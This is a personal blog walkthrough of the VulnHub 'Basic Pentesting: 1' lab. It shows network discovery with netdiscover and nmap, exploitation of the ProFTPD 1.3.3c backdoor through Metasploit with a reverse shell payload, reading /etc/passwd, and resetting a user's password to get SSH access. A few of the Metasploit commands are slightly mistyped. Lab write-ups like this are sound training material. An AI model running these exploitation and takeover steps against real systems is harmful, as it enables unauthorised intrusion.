Basic Pentesting: 1 Walkthrough | Vulnhub

Basic Pentesting: 1 Walkthrough | Vulnhub

Table of contents

No heading

No headings in the article.

This blog is about the walkthrough of basic pen testing: 1 from VulnHub and this box is made by Josiah Pierce. It includes many remote vulnerabilities and vectors for escalation privileges.

Without further ado let's hack the box!!

First of all, I tried to see if login creds are required or not in the VM. Unfortunately, it needs credentials. I don't know its IP address as well, so to put it in the same network as my attacker machine, I put the vuln VM in NAT (since the attacker machine is behind NAT). So I used the below command to scan through all my networks and see if there is any IP that I don't recognize.

netdiscover -r 192.168.29.0/24

Pasted image 20220921145700.png

As I have found that an unrecognized IP so I am gonna check If there are any ports open in that machine. To do that:

nmap -A -p- 192.168.29.148

Pasted image 20220921145753.png

As we can see that there are 3 ports open.

  • FTP:21
  • SSH:22
  • APACHE:80

For this blog, I am gonna exploit the FTP service. Let's dig down to if we can see any vulnerabilities in the FTP port. Let's use our friend Nmap for help and use the below command.

nmap --script=vuln -p21 192.168.29.148

Pasted image 20220921145824.png

And Voilà there we have it, a backdoor vulnerability to the VM. So I am gonna use me another friend msfconsole to exploit that vulnerability.

msfconsole

Let's search exploit for our FTP vulnerability by using:

search ftp_133c

Pasted image 20220921200217.png

Let's use this vulnerability to get root access to the VM.

use unix/ftp/proftpd_133c_backdoor

In msfconsole we have to mention the host(victim IP) and host(attacker IP) to do that let's use the following command.

set rhost 192.168.29.148
set lhost 192.168.29.147

Finally, let's select our payload for our job and exploit the VM.

set payload payload/cmd/Unix/reverse
exploit

Pasted image 20220921201043.png

If you want to upgrade this shell to a meterpreter use the following command. As I don't want to so I am just gonna spawn a TTY shell to do my dirty work.

To upgrade shell to meterpreter

background
session -u 1

To spawn a TTY shell

python -c 'import pty; pty.spawn("/bin/sh")'

Now let's see how many users are there in this VM.

cat /etc/passwd

As a result, I found a user named "marlinspike" interesting. So let's see if we can change the password and do an ssh connection with this user name.

passwd marlinspike

Now let's see if we can make an ssh connection with this user and Voilà we made the connection

Pasted image 20220921202236.png

Thank you for reading this blog<3

Best Regards,

MILAN DANGOL